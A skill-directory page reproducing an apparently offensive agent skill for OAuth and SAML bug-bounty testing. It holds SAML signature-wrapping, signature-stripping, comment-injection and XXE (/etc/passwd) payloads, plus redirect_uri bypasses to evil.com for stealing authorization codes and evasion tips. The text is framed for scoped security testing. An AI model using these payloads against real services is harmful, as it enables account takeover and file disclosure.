Agent skill

Hunt Federation

by Encod3d-Sec in Encod3d-Sec/TORCH

OAuth and SAML attack hunting - redirecturi bypass, state CSRF, SAML XSW (XSW1-XSW8), signature stripping, comment injection.

MITAuto-check passedBackend & APIs

Install Hunt Federation

skills CLI
$ npx skills add Encod3d-Sec/TORCH --skill hunt-federation -a claude-code

Project install by default; add -g for ~/.claude/skills/.

GitHub CLI
$ gh skill install Encod3d-Sec/TORCH hunt-federation --agent claude-code

Project scope by default; add --scope user for a personal install. Needs GitHub CLI 2.90.0 or later (public preview).

Manual copy
$ git clone --depth 1 https://github.com/Encod3d-Sec/TORCH.git skills-src && mkdir -p .claude/skills && cp -r skills-src/skills/hunt/hunt-federation .claude/skills/hunt-federation && rm -rf skills-src

Use ~/.claude/skills/ instead of .claude/skills for a personal install. The folder must contain SKILL.md.

Claude Code skills documentation · loads skills from .claude/skills/

Facts

Skill name
hunt-federation
GitHub stars
329
Token cost
~1.8k tokens
SKILL.md length
706 words
Files
1
Skills in repo
35
Repo updated
First seen
Licence
MIT

At a glance

OAuth and SAML attack hunting - redirecturi bypass, state CSRF, SAML XSW (XSW1-XSW8), signature stripping, comment injection.

  • Works in 5 steps: redirect_uri handling - highest yield.… → Signature validation - is the assertion… → The XSW1-XSW8 matrix - signature covers… → …
  • Tasks that involve Web application vulnerabilities
  • SKILL.md covers Wiki, Attack surface, SAML Attacks and OAuth Attacks, plus 5 more sections
  • Calls python3; reaches legit.com

What it does

Hunt Federation is an agent skill from Encod3d-Sec/TORCH. OAuth and SAML attack hunting - redirecturi bypass, state CSRF, SAML XSW (XSW1-XSW8), signature stripping, comment injection. Wiki-first, FIND schema output.

Its SKILL.md is about 1.8k tokens, which your agent loads only when the skill is triggered. It is a single SKILL.md file with no bundled scripts.

It sits in Backend & APIs, covering Web application vulnerabilities and OAuth and OpenID Connect. The repository describes itself as: Karpathy LLM based claude harness for PenetrationTesting / Bugbounty using obsidian. The licence is MIT.

When your agent uses it

  • Tasks that involve Web application vulnerabilities
  • Tasks that involve OAuth and OpenID Connect

Example prompts

  • “/hunt-federation”

Requirements

  • Python 3

Workflow steps

5 steps, taken from the first numbered list in SKILL.md.

  1. redirect_uri handling - highest yield. This is where the code/token is delivered; a permissive
  2. Signature validation - is the assertion signature checked at all, and does it cover exactly what
  3. The XSW1-XSW8 matrix - signature covers a signed element, the SP trusts a wrapper assertion.
  4. state / CSRF - a missing or client-only state on the OAuth callback enables login-CSRF and
  5. OIDC metadata and client leakage - .well-known/openid-configuration, JS bundles, APK resources

What it can do on your machine

Read from SKILL.md and the folder at commit d21b6c9. It shows what the files ask for, not the result of running them.

  • Tool permissions

    Pre-approves nothing: there is no allowed-tools line, so your agent's usual permission prompts apply.

    From allowed-tools in the SKILL.md frontmatter.

  • Runs code

    Shell commands in SKILL.md call:

    • python3

    From the folder's file list and the shell code blocks in SKILL.md.

  • Network

    Hosts in commands or code, which the agent is likely to contact:

    • legit.com

    From URLs in SKILL.md, links to its own repository left out.

  • Credentials

    Names no API keys, tokens, secrets or passwords.

    From names ending in _API_KEY, _TOKEN, _SECRET, _KEY or _PASSWORD in SKILL.md.

Context cost

Hunt Federation loads about 1.8k tokens when it runs. Until then it costs about 44 tokens; SKILL.md has 706 words of instructions outside code blocks.

Always · name and description, kept in context so the agent knows when to use it
~44
When it runs · the whole SKILL.md, loaded when a task matches
~1.8k

Estimates: characters ÷ 4, the usual rule of thumb; real counts depend on the model's tokenizer. Scripts and assets cost tokens only if the agent reads them.

Safety

Auto-check passed

The automated check found no risky patterns in SKILL.md.

Automated static check — not a guarantee. Review scripts before installing. It scans the text of SKILL.md for risky patterns (piping downloads into a shell, reading credential files, hidden Unicode, destructive commands); files beside SKILL.md are not scanned.

SKILL.md

The full file from Encod3d-Sec/TORCH at commit d21b6c9, republished under its MIT licence (© Encod3d-Sec). 706 words, ~1,816 tokens.

Download SKILL.mdSave it as .claude/skills/hunt-federation/SKILL.md (or your agent's skills folder).
name
hunt-federation
description
OAuth and SAML attack hunting - redirect_uri bypass, state CSRF, SAML XSW (XSW1-XSW8), signature stripping, comment injection. Wiki-first, FIND schema output.

Hunt: OAuth / SAML / Federation

Assumes hunt-core for the scope gate, two-account rule, confirmation gate, enumeration limits, stop conditions, wiki protocol, FIND output, and Deadends. Do not re-derive any of that here.

Wiki

qmd_query "OAuth SAML federation redirect_uri bypass XSW signature stripping state CSRF" via wiki-search MCP

Hub: [[web-moc]] (live index). Primary page: [[oauth-attacks]]. Payload arsenal: wiki/payloads/oauth-saml.md. Anchors: [[saml-attacks]].

Attack surface

Entry points:

/oauth/authorize  /oauth/token  /oauth/callback  /auth/callback
/saml/  /saml/acs  /sso/saml  /auth/saml/callback
/login?redirect_uri=  /signin?next=

Rank before testing - most federation payouts come from the top of this list:

  1. redirect_uri handling - highest yield. This is where the code/token is delivered; a permissive match leaks it to an attacker origin and chains straight to ATO.
  2. Signature validation - is the assertion signature checked at all, and does it cover exactly what the parser reads (stripping, comment injection live here).
  3. The XSW1-XSW8 matrix - signature covers a signed element, the SP trusts a wrapper assertion. Automate the eight variants with SAML Raider.
  4. state / CSRF - a missing or client-only state on the OAuth callback enables login-CSRF and attacker-to-victim account linking.
  5. OIDC metadata and client leakage - .well-known/openid-configuration, JS bundles, APK resources: leaked client_secret, extra grant types, unadvertised endpoints.

SAML Attacks

Attack 1: XSW - Signature Wrapping
xml
<!-- Original: legit assertion by user@company.com -->
<!-- Modified: inject evil assertion with admin@company.com before the signed one -->
<saml:Response>
  <saml:Assertion ID="evil">
    <NameID>admin@company.com</NameID>  <!-- Attacker-controlled -->
  </saml:Assertion>
  <saml:Assertion ID="legit">
    <NameID>user@company.com</NameID>
    <ds:Signature><!-- Valid, covers ID=legit --></ds:Signature>
  </saml:Assertion>
</saml:Response>

Use SAMLRaider Burp extension for automated XSW1-XSW8 testing.

Attack 2: Signature Stripping
bash
# 1. Decode
echo "BASE64_SAML" | base64 -d | xmllint --format - > saml.xml
# 2. Delete entire <Signature> element
# 3. Change NameID to admin@company.com
# 4. Re-encode
base64 -w0 saml.xml
# 5. POST -- if server doesn't verify signature = Critical ATO
Attack 3: Comment Injection
xml
<NameID>admin<!---->@company.com</NameID>
<!-- Signature covers "admin<!---->@company.com" but parser sees "admin@company.com" -->
Attack 4: XXE in SAML Assertion
xml
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<saml:Assertion><NameID>&xxe;</NameID></saml:Assertion>

OAuth Attacks

redirect_uri Bypass (highest yield)
Try: redirect_uri=https://legit.com.evil.com
Try: redirect_uri=https://legit.com/callback/../../../evil
Try: redirect_uri=https://legit.com&redirect_uri=https://evil.com  (param pollution)
Try: encoded chars %2F %40 %23
State CSRF
  • Remove state parameter entirely - does the flow complete?
  • Is state validated server-side or only client-side?
Nonce Replay / Referrer Leak
  • Check if on-page resources receive full Referer header containing the access token/code in URL
  • Language switchers, analytics, social share buttons loaded post-auth are common culprits

Methodology

Setup: two accounts per hunt-core - a victim SSO identity and an attacker identity/client, in separate browser profiles so SSO cookies never cross.

  1. Map all OAuth/SAML entry points
  2. Capture a valid SAMLResponse via Burp - decode Base64, inspect XML
  3. Test SAML: XSW (SAMLRaider), signature stripping, comment injection, XXE
  4. Test OAuth: redirect_uri variations, state removal, nonce replay
  5. Check .well-known/openid-configuration for OIDC surface
  6. Check client_secret in JS bundles or APK resources
  7. Verify impact: demonstrate ATO or privilege escalation on test account
  8. Distill when confirmed - a reusable XSW variant or redirect_uri bypass, GENERIC, no client host: python3 scripts/wiki-stage.py --kind technique --slug <slug> --target-page techniques/web/oauth-attacks.md (SAML findings: python3 scripts/wiki-stage.py --kind technique --slug <slug> --target-page techniques/web/saml-attacks.md).

Chaining and evasion

Chain: a permissive redirect_uri (host confusion, path traversal, param pollution, or the post-auth Referer leak above) -> steal the authorization code -> exchange it at /oauth/token -> full ATO. A trusted NameID / sub from a stripped or XSW assertion is itself an auth bypass; hand the resulting session to hunt-auth for reset-poisoning and session follow-through.

Evasion when the direct attempt is rejected: cycle the remaining redirect_uri encodings (%2F %40 %23, legit.com.evil.com, legit.com/../evil, double redirect_uri=) before calling it validated; when XSW1/2 fail, walk XSW3-XSW8 with SAML Raider (each moves the wrapper relative to the signed element and the Response-vs-Assertion boundary) before declaring signatures enforced.

Show full SKILL.md (235 more words)Show less

Confirmation gate

NOT confirmation: a redirect that carries an authorization code or token in its URL; an IdP or SP returning 200 on a modified SAMLResponse; the assertion "accepted"; the flow completing with state removed; any error, even a revealing one. None of these prove you hold another account.

IS confirmation: a token or authenticated session for another account, obtained through the flaw - an authorization code stolen via an attacker-controlled redirect_uri and exchanged for that account's token, or a forged / XSW / signature-stripped assertion that logs you in as the victim (admin session reached). Then exercise the session, and reproduce from scratch in a clean browser profile with no cached SSO state (per hunt-core). If the session vanishes in a clean profile, you replayed your own login.

Severity

Rated on the session actually obtained, not on what the server merely accepted.

OutcomeTypical
Forged / XSW / stripped assertion logs in as admin (SAML auth bypass)critical - direct ATO
redirect_uri bypass yields a victim's code/token, exchanged to a sessioncritical / high - ATO
Login-CSRF via missing state (attacker session linked to a victim)medium / high
Leaked client_secret / OIDC misconfig, no cross-account session obtainedlow - enables other attacks

Unauthenticated ATO outranks one needing victim interaction. An assertion the SP accepts that yields no other-account session is not a finding - it is a Deadend.

Deadends

Append: - [ ] SAML/OAuth on <host> -- XSW1-8 + strip + comment rejected, signature covers NameID;
              redirect_uri strictly validated (no encoding/host/traversal/pollution bypass); state enforced

Record which variants you tried, not just that it failed - the next pass needs the boundary.

© Encod3d-Sec, MIT. Rendered from Markdown: HTML in the file is shown as text, images as links, and headings moved down two levels. Raw file

Files

Just SKILL.md in skills/hunt/hunt-federation of Encod3d-Sec/TORCH.

Open the folder on GitHubat commit d21b6c9

Compare with similar skills

Hunt Federation next to the 5 skills that share the most tags, products or categories with it. Stars are the repository's; “used in” counts other GitHub owners with a copy.

Hunt Federation compared with similar skills
SkillStarsUsed inTokensAuto-checkLicenceRepo updated
Hunt Federation this skillEncod3d-Sec/TORCH329—~1.8kAutomated safety check: PassMIT
Better Auth Security Best PracticesEpicenterHQ/epicenter4.8k—~896Automated safety check: PassCustom licence
Implementing API Threat Protection With Apigeemukul975/Anthropic-Cybersecurity-Skills34k—~2.8kAutomated safety check: PassApache-2.0
Web Ssrfs0ld13rr/pentestcode828—~660Automated safety check: WarnMIT
Secure Authjamditis/claude-skills-journalism416—~14kAutomated safety check: PassMIT
Discord Php Bot Securitydiscord-php/DiscordPHP1.1k—~1.2kAutomated safety check: NotesMIT

Similar skills

  • Better Auth security hardening: rate limits, secrets, CSRF, trusted origins, cookies, sessions, OAuth tokens, and audit logging.

    4.8k GitHub stars~896 tokensUpdated 2 days ago
    Backend & APIsAuto-check passed
  • Implementing API Threat Protection With Apigee

    mukul975/Anthropic-Cybersecurity-Skills

    Implements API threat protection using Google Apigee reverse-proxy policies, including JSON/XML threat protection, OAuth 2.0 enforcement, SpikeArrest rate limiting, regex-based threat detection, and…

    34k GitHub stars~2.8k tokensUpdated 1 mo ago
    Backend & APIsAuto-check passed
  • Web Ssrf

    s0ld13rr/pentestcode

    Server-Side Request Forgery detection→internal-access→proof for web apps.

    828 GitHub stars~660 tokensUpdated 8 days ago
    Backend & APIsAuto-check: warnings
  • Secure Auth

    jamditis/claude-skills-journalism

    Secure authentication patterns (OWASP, NIST). An agent skill from jamditis/claude-skills-journalism.

    416 GitHub stars~14k tokensUpdated 6 days ago
    Backend & APIsAuto-check passed
  • Discord Php Bot Security

    discord-php/DiscordPHP

    Audit checklist for DiscordPHP bots and API libraries — stop the bot token leaking to third-party APIs or logs, keep secrets out of customids and exception messages, use constant-time comparison and…

    1.1k GitHub stars~1.2k tokensUpdated today
    Backend & APIsAuto-check: notes
  • Frontmcp Auth UI

    agentfront/frontmcp

    A skill your agent uses when customizing, branding, or replacing the built-in FrontMCP OAuth pages (the login, consent, federated-select, incremental-authorization, and error pages) with your own…

    146 GitHub stars~3.7k tokensUpdated today
    Backend & APIsAuto-check passed

More from Encod3d-Sec/TORCH

All 35 skills in this repo
  • Runs a bug-bounty engagement through a script that tracks the current pass, builds a board of rows from recon and prints the next required action each turn.

    329 GitHub stars~1.8k tokensUpdated 1 mo ago
    Auto-check passed
  • Checks that the bb, pt and ctf workflow driver is set up correctly on a machine: vault content, skill symlinks, hooks, imports and a live smoke test, with fixes for failures.

    329 GitHub stars~611 tokensUpdated 1 mo ago
    Auto-check passed
  • Opens a visible Chromium window on a Kali VM so an operator can complete a manual login or CAPTCHA while the agent watches and acts through the chrome-devtools MCP.

    329 GitHub stars~1.2k tokensUpdated 1 mo ago
    Auto-check passed
  • CTF Campaign Driver

    Encod3d-Sec/TORCH

    Runs a capture-the-flag box from first scan to root with a driver script that tracks progress and prints the next action each turn.

    329 GitHub stars~1.8k tokensUpdated 1 mo ago
    Auto-check passed
  • Decides when a main pentesting agent should hand a fully-specified, mechanical exploit-compile or privilege-escalation step to a cheaper sub-agent, and how to specify that handoff safely.

    329 GitHub stars~1.6k tokensUpdated 1 mo ago
    Auto-check: notes
  • Adaptive Web Fuzzing

    Encod3d-Sec/TORCH

    Adaptive web fuzzing for pentests, bug bounty and CTF work: picks the smallest suitable SecLists wordlist per target surface and calibrates filters against soft-404 responses.

    329 GitHub stars~1.3k tokensUpdated 1 mo ago
    Auto-check passed

Questions about Hunt Federation

What does Hunt Federation do?

OAuth and SAML attack hunting - redirecturi bypass, state CSRF, SAML XSW (XSW1-XSW8), signature stripping, comment injection. Hunt Federation is an agent skill from Encod3d-Sec/TORCH. OAuth and SAML attack hunting - redirecturi bypass, state CSRF, SAML XSW (XSW1-XSW8), signature stripping, comment injection.

When should I use Hunt Federation?

Hunt Federation fits situations like: tasks that involve Web application vulnerabilities; tasks that involve OAuth and OpenID Connect.

How do I install Hunt Federation in Claude Code?

Run `npx skills add Encod3d-Sec/TORCH --skill hunt-federation -a claude-code`. Or copy the skill folder (skills/hunt/hunt-federation in Encod3d-Sec/TORCH) into .claude/skills/hunt-federation in your project. Claude Code loads it when a task matches its description.

How do I install Hunt Federation in Codex?

Run `npx skills add Encod3d-Sec/TORCH --skill hunt-federation -a codex`. Or copy the skill folder (skills/hunt/hunt-federation in Encod3d-Sec/TORCH) into .agents/skills/hunt-federation in your project. Codex loads it when a task matches its description.

Can I use Hunt Federation in Cursor, Gemini CLI or GitHub Copilot?

Cursor, Gemini CLI, GitHub Copilot and OpenCode also load SKILL.md folders. With the skills CLI, run `npx skills add Encod3d-Sec/TORCH --skill hunt-federation -a cursor` (or -a gemini-cli, github-copilot or opencode for the others). To copy it by hand, put the folder in .cursor/skills/hunt-federation, .gemini/skills/hunt-federation, .github/skills/hunt-federation and .opencode/skills/hunt-federation in your project.

What does Hunt Federation need to run?

Going by SKILL.md and its folder, Hunt Federation needs the command-line tools its instructions call (python3). Our summary lists: Python 3.

Does Hunt Federation access the network?

SKILL.md names 1 domain. In commands or code: legit.com; the agent is likely to contact it when it follows the instructions. This is read from the text; nothing was executed.

Is Hunt Federation safe to install?

Our automated static check of SKILL.md found no risky patterns, such as piping downloads into a shell, reading credential files or hidden Unicode. It is not a guarantee. Review the folder before installing.

What licence does Hunt Federation use?

Hunt Federation is published under the MIT licence (the repository's licence). It allows redistribution, so the full SKILL.md is shown on this page.

How many tokens does Hunt Federation use?

About 1.8k tokens (SKILL.md is roughly 7.3k characters). Agents keep only the skill's name and description in context until a task matches; then they load SKILL.md in full.

What are the alternatives to Hunt Federation?

Skills that share tags, products or a category with Hunt Federation: Better Auth Security Best Practices (EpicenterHQ/epicenter, 4.8k stars), Implementing API Threat Protection With Apigee (mukul975/Anthropic-Cybersecurity-Skills, 34k stars), Web Ssrf (s0ld13rr/pentestcode, 828 stars) and Secure Auth (jamditis/claude-skills-journalism, 416 stars). The comparison table on this page puts their stars, adoption, token cost, safety result and licence side by side.

Who maintains Hunt Federation?

Encod3d-Sec (a GitHub user) maintains it in Encod3d-Sec/TORCH, which has 329 GitHub stars. The repository holds 35 skills in this directory. The repository was last updated on September 1, 2026.

Source: Encod3d-Sec/TORCH on GitHub. Facts on this page come from the repository at the commit we read; the author's words are quoted as theirs.